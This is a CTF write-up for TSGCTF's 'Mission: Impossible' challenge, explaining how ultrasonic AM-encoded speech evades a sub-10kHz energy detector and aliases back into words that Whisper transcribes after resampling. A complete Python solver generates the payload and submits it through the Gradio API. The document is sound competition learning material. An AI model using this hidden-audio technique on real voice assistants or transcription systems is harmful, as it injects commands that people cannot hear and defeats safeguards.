./contents.sh

z0d1ak@ctf:~$ cat sections.md
z0d1ak@ctf:~$ _
writeup.md - z0d1ak@ctf
Web Exploitation
TSGCTF
December 22, 2025
4 min read

TSGCTF - Mission: Impossible

theg1239
z0d1ak@ctf:~$ ./author.sh

# Mission: Impossible

## Summary

The site is a Gradio “CIA Vault Terminal” that transcribes uploaded audio with Whisper. If the transcription contains give me the flag, it returns the flag.

However, before Whisper runs, the server performs a crude “intruder detection” step on the STFT and immediately blocks anything with non-zero energy below 10kHz.

The solve is to submit an ultrasonic (>10kHz) audio command that passes the detector, but becomes intelligible to Whisper after the server resamples the audio to 16kHz.


## Entry Point

Key parts:

  • Converts uploaded int16 audio to float and truncates to 5 seconds.
  • Computes STFT (librosa.stft) and zeroes small bins (< 0.01).
  • Calls detect_intruder(freq_space, sr):
    • First zeroes high frequencies above 10kHz.
    • Then checks magnitude = abs(freq_space).max() and alerts if magnitude > 0.

So any remaining energy under 10kHz triggers:

ALERT! Intruder detected!

If it passes, audio is resampled:

python
wave = librosa.resample(wave, orig_sr=sr, target_sr=16000, res_type="linear") result = whisper.transcribe(model, wave, temperature=0.0)["text"]

Then:

python
if "give me the flag" in result.lower(): return "OK, here is the flag: " + FLAG

## Vulnerability / Idea

The “intruder detector” is effectively a low-frequency energy detector:

  • It removes everything above 10kHz before checking magnitude.
  • Therefore, if we send audio whose energy is entirely above 10kHz, the detector sees (almost) nothing.

But then the server resamples to 16kHz with res_type="linear". Improper/insufficient low-pass filtering during resampling can cause ultrasonic content to alias (fold) into the audible band.

So we want:

  1. An uploaded waveform with almost no <10kHz energy (to avoid the alert)
  2. After resampling to 16kHz, the aliased signal resembles speech enough for Whisper to transcribe “give me the flag”

## Exploit Approach

I generate a clean TTS sample of the command phrase at 16kHz, then encode it into an ultrasonic AM waveform at 48kHz:

  • Start with baseband speech m(t) (low-passed to ~3.5kHz).
  • Upsample 16kHz → 48kHz with simple linear interpolation.
  • Multiply by a 16kHz cosine carrier to shift energy above 10kHz:

y[n]=m[n]cos(2πfcn/48000)y[n] = m[n] \cdot \cos(2\pi f_c n / 48000)

  • Optionally apply a high-pass around ~10.5kHz to reduce any residual leakage.

The final audio mostly lives above 10kHz (passes the detector), but the resampling step reintroduces intelligible content for Whisper.

In practice, repeating the phrase once improved Whisper reliability:

"give me the flag give me the flag"


## Automation (Gradio API)

The UI says “Use via API”, and the page exposes its config (window.gradio_config) with api_prefix=/gradio_api.

The solver uses:

  1. POST /gradio_api/upload (multipart) to upload the WAV
  2. POST /gradio_api/call/predict with JSON {"data": [FileData]}
  3. GET /gradio_api/call/predict/<event_id> (SSE) to read the final text output

## Solver

The final solver can be found below

## Flag

TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}
solve.sh - z0d1ak@ctf
#!/usr/bin/env python3
import argparse
import array
import json
import math
import os
import re
import subprocess
import sys
import tempfile
import time
import urllib.error
import urllib.request
import uuid
import wave
from dataclasses import dataclass

FLAG_RE = re.compile(r"TSGCTF\{[^\n\r}]*\}")


@dataclass
class Target:
    base_url: str

    @property
    def api_prefix(self) -> str:
        return self.base_url.rstrip("/") + "/gradio_api"


def run_say_to_wav(out_wav: str, text: str, sr: int = 44100, rate_wpm: int | None = None, voice: str | None = None):
    cmd = [
        "say",
        *( ["-v", voice] if voice else [] ),
        *( ["-r", str(rate_wpm)] if rate_wpm else [] ),
        "-o",
        out_wav,
        "--file-format=WAVE",
        f"--data-format=LEI16@{sr}",
        text,
    ]
    subprocess.check_call(cmd)


def read_wav_mono_int16(path: str):
    with wave.open(path, "rb") as wf:
        nch = wf.getnchannels()
        sampwidth = wf.getsampwidth()
        sr = wf.getframerate()
        nframes = wf.getnframes()
        if sampwidth != 2:
            raise ValueError(f"expected 16-bit PCM wav, got sampwidth={sampwidth}")
        raw = wf.readframes(nframes)
    audio = array.array("h")
    audio.frombytes(raw)

    if nch == 1:
        return sr, audio
    if nch == 2:
        mono = array.array("h")
        # average L/R
        for i in range(0, len(audio), 2):
            mono.append(int((int(audio[i]) + int(audio[i + 1])) / 2))
        return sr, mono
    raise ValueError(f"unsupported channels: {nch}")


def write_wav_mono_int16(path: str, sr: int, audio_i16):
    if isinstance(audio_i16, array.array):
        if audio_i16.typecode != "h":
            raise ValueError("audio_i16 must be int16 array('h')")
        data_bytes = audio_i16.tobytes()
    else:
        a = array.array("h", audio_i16)
        data_bytes = a.tobytes()
    with wave.open(path, "wb") as wf:
        wf.setnchannels(1)
        wf.setsampwidth(2)
        wf.setframerate(sr)
        wf.writeframes(data_bytes)


def ultrasonic_shift(
    base_i16,
    sr: int,
    carrier_hz: float = 15000.0,
    max_amp: float = 0.05,
    lp_cutoff_hz: float = 3500.0,
    hp_cutoff_hz: float = 10500.0,
):
    if not isinstance(base_i16, array.array) or base_i16.typecode != "h":
        base_i16 = array.array("h", base_i16)

    if len(base_i16) == 0:
        raise ValueError("empty audio")

    mean = sum(int(s) for s in base_i16) / float(len(base_i16))

    dt = 1.0 / float(sr)

    # Low-pass baseband speech to reduce bandwidth before upconverting.
    lp_alpha = None
    if lp_cutoff_hz and lp_cutoff_hz > 0:
        rc_lp = 1.0 / (2.0 * math.pi * float(lp_cutoff_hz))
        lp_alpha = dt / (rc_lp + dt)

    w = 2.0 * math.pi * float(carrier_hz) / float(sr)
    phase = 0.0
    y_f = [0.0] * len(base_i16)
    lp_state = 0.0
    for i, s in enumerate(base_i16):
        x = (float(int(s)) - mean) / 32768.0
        if lp_alpha is not None:
            lp_state = lp_state + lp_alpha * (x - lp_state)
            x = lp_state
        y_f[i] = x * math.cos(phase)
        phase += w

    # High-pass to kill any low-frequency leakage.
    if hp_cutoff_hz and hp_cutoff_hz > 0:
        # dt already computed above
        rc = 1.0 / (2.0 * math.pi * float(hp_cutoff_hz))
        alpha = rc / (rc + dt)
        hp = [0.0] * len(y_f)
        prev_x = y_f[0]
        prev_y = 0.0
        hp[0] = 0.0
        for i in range(1, len(y_f)):
            x = y_f[i]
            y = alpha * (prev_y + x - prev_x)
            hp[i] = y
            prev_x = x
            prev_y = y
        y_f = hp

    peak = max(abs(v) for v in y_f) if y_f else 0.0

    if peak < 1e-12:
        raise ValueError("unexpected near-silence from TTS")

    scale = float(max_amp) / peak
    out = array.array("h")
    for y in y_f:
        v = int(round(y * scale * 32767.0))
        if v > 32767:
            v = 32767
        elif v < -32768:
            v = -32768
        out.append(v)
    return out


def lowpass_iir(samples_f, sr: int, cutoff_hz: float):
    if not cutoff_hz or cutoff_hz <= 0:
        return list(samples_f)
    dt = 1.0 / float(sr)
    rc = 1.0 / (2.0 * math.pi * float(cutoff_hz))
    alpha = dt / (rc + dt)
    y = 0.0
    out = []
    for x in samples_f:
        y = y + alpha * (x - y)
        out.append(y)
    return out


def encode_ultrasonic(
    base16_i16: array.array,
    max_amp: float = 0.9,
    lp_cutoff_hz: float = 3500.0,
    carrier_hz: float = 16000.0,
    hp_cutoff_hz: float = 10500.0,
):
    """Encode 16kHz speech into an ultrasonic (48kHz) AM signal.

    Key detail: we upsample the envelope by 3 using linear interpolation to avoid images at 16kHz.
    Then we modulate with a 16kHz carrier so all energy stays above the 10kHz detector cutoff.
    """
    if base16_i16.typecode != "h":
        raise ValueError("base16_i16 must be array('h')")

    x16 = [float(int(s)) / 32768.0 for s in base16_i16]
    x16 = lowpass_iir(x16, sr=16000, cutoff_hz=lp_cutoff_hz)

    # Upsample 16k -> 48k (x3) with linear interpolation.
    x48 = []
    for i in range(len(x16) - 1):
        a = x16[i]
        b = x16[i + 1]
        x48.append(a)
        x48.append(a + (b - a) / 3.0)
        x48.append(a + 2.0 * (b - a) / 3.0)
    if x16:
        x48.extend([x16[-1], x16[-1], x16[-1]])

    peak = max(abs(v) for v in x48) if x48 else 0.0
    if peak < 1e-12:
        raise ValueError("unexpected near-silence from TTS")
    scale = float(max_amp) / peak

    w = 2.0 * math.pi * float(carrier_hz) / 48000.0
    phase = 0.0
    y48 = [0.0] * len(x48)
    for i, v in enumerate(x48):
        y48[i] = (v * scale) * math.cos(phase)
        phase += w

    # Optional high-pass to remove any residual <10k leakage.
    if hp_cutoff_hz and hp_cutoff_hz > 0:
        dt = 1.0 / 48000.0
        rc = 1.0 / (2.0 * math.pi * float(hp_cutoff_hz))
        alpha = rc / (rc + dt)
        prev_x = y48[0]
        prev_y = 0.0
        for i in range(1, len(y48)):
            x = y48[i]
            y = alpha * (prev_y + x - prev_x)
            y48[i] = y
            prev_x = x
            prev_y = y
        y48[0] = 0.0

    out = array.array("h")
    for a in y48:
        iv = int(round(a * 32767.0))
        if iv > 32767:
            iv = 32767
        elif iv < -32768:
            iv = -32768
        out.append(iv)
    return 48000, out


def http_post_multipart(url: str, field_name: str, filename: str, content_type: str, data: bytes, timeout_s: float = 20.0):
    boundary = "----WebKitFormBoundary" + uuid.uuid4().hex
    parts = []

    parts.append(f"--{boundary}\r\n".encode())
    parts.append(
        (
            f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n"
        ).encode()
    )
    parts.append(data)
    parts.append(b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())

    body = b"".join(parts)
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    req.add_header("Content-Length", str(len(body)))

    with urllib.request.urlopen(req, timeout=timeout_s) as resp:
        return resp.read()


def http_post_json(url: str, payload: dict, timeout_s: float = 20.0):
    data = json.dumps(payload).encode("utf-8")
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", "application/json")
    with urllib.request.urlopen(req, timeout=timeout_s) as resp:
        return resp.read()


def sse_read_final_result(url: str, timeout_s: float = 60.0):
    req = urllib.request.Request(url, method="GET")
    start = time.time()
    buf = ""
    last_data = None

    with urllib.request.urlopen(req, timeout=timeout_s) as resp:
        while True:
            if time.time() - start > timeout_s:
                raise TimeoutError("SSE timeout")
            chunk = resp.readline()
            if not chunk:
                break
            line = chunk.decode("utf-8", "replace")
            buf += line
            if line.startswith("data:"):
                data_str = line[len("data:") :].strip()
                if not data_str:
                    continue
                try:
                    last_data = json.loads(data_str)
                except json.JSONDecodeError:
                    continue
                # Often the final payload is a list of outputs.
                if isinstance(last_data, list):
                    return last_data
    return last_data


def extract_flag(text: str):
    m = FLAG_RE.search(text)
    return m.group(0) if m else None


def solve_remote(target: Target, wav_path: str):
    upload_url = target.api_prefix + "/upload"
    with open(wav_path, "rb") as f:
        wav_bytes = f.read()

    upload_resp = http_post_multipart(
        upload_url,
        field_name="files",
        filename=os.path.basename(wav_path),
        content_type="audio/wav",
        data=wav_bytes,
        timeout_s=30.0,
    )
    uploaded = json.loads(upload_resp.decode("utf-8", "replace"))

    # Gradio returns a list of server-side tmp paths.
    if isinstance(uploaded, list) and uploaded and isinstance(uploaded[0], str):
        server_path = uploaded[0]
    elif isinstance(uploaded, dict) and "files" in uploaded and uploaded["files"]:
        server_path = uploaded["files"][0]
    else:
        raise ValueError(f"unexpected upload response: {uploaded!r}")

    filedata = {
        "path": server_path,
        "orig_name": os.path.basename(wav_path),
        "mime_type": "audio/wav",
        "meta": {"_type": "gradio.FileData"},
    }

    # Queue-enabled: start a job, then read SSE.
    call_url = target.api_prefix + "/call/predict"
    call_resp = http_post_json(call_url, {"data": [filedata]}, timeout_s=30.0)
    call_json = json.loads(call_resp.decode("utf-8", "replace"))
    event_id = call_json.get("event_id")
    if not event_id:
        raise ValueError(f"no event_id in response: {call_json!r}")

    result_url = target.api_prefix + f"/call/predict/{event_id}"
    final = sse_read_final_result(result_url, timeout_s=90.0)

    # Normalize into a string message.
    if isinstance(final, list) and final and isinstance(final[0], str):
        msg = final[0]
    elif isinstance(final, str):
        msg = final
    else:
        msg = json.dumps(final)

    flag = extract_flag(msg)
    if flag:
        return flag, msg
    return None, msg


def main():
    ap = argparse.ArgumentParser(description="TSGCTF Mission: Impossible solver")
    ap.add_argument("--url", default="http://35.194.98.181:57860", help="Base URL of the Gradio app")
    ap.add_argument("--text", default="give me the flag", help="Text to synthesize (must contain the command)")
    ap.add_argument("--rate", type=int, default=260, help="TTS speaking rate (words per minute)")
    ap.add_argument("--amp", type=float, default=0.9, help="Max amplitude (0..1) for the ultrasonic payload.")
    ap.add_argument("--lp", type=float, default=3500.0, help="Low-pass cutoff Hz applied to the 16k speech before encoding.")
    ap.add_argument("--keep", action="store_true", help="Keep generated wav files")
    args = ap.parse_args()

    target = Target(args.url)

    with tempfile.TemporaryDirectory() as td:
        base_wav = os.path.join(td, "base.wav")
        payload_wav = os.path.join(td, "payload.wav")

        # Generate clean baseband at 16kHz.
        run_say_to_wav(base_wav, args.text, sr=16000, rate_wpm=args.rate)
        sr16, base16_i16 = read_wav_mono_int16(base_wav)
        if sr16 != 16000:
            raise ValueError(f"unexpected TTS sample rate: {sr16}")

        sr48, payload_i16 = encode_ultrasonic(
            base16_i16,
            max_amp=args.amp,
            lp_cutoff_hz=args.lp,
        )
        write_wav_mono_int16(payload_wav, sr=sr48, audio_i16=payload_i16)

        if args.keep:
            kept_base = os.path.abspath("mission_base.wav")
            kept_payload = os.path.abspath("mission_payload.wav")
            write_wav_mono_int16(kept_base, sr=sr16, audio_i16=base16_i16)
            write_wav_mono_int16(kept_payload, sr=sr48, audio_i16=payload_i16)
            print(f"kept: {kept_base}")
            print(f"kept: {kept_payload}")

        flag, msg = solve_remote(target, payload_wav)
        if flag:
            print(flag)
        else:
            print(msg)
            raise SystemExit("Flag not found")


if __name__ == "__main__":
    main()

Comments(0)

No comments yet. Be the first to share your thoughts!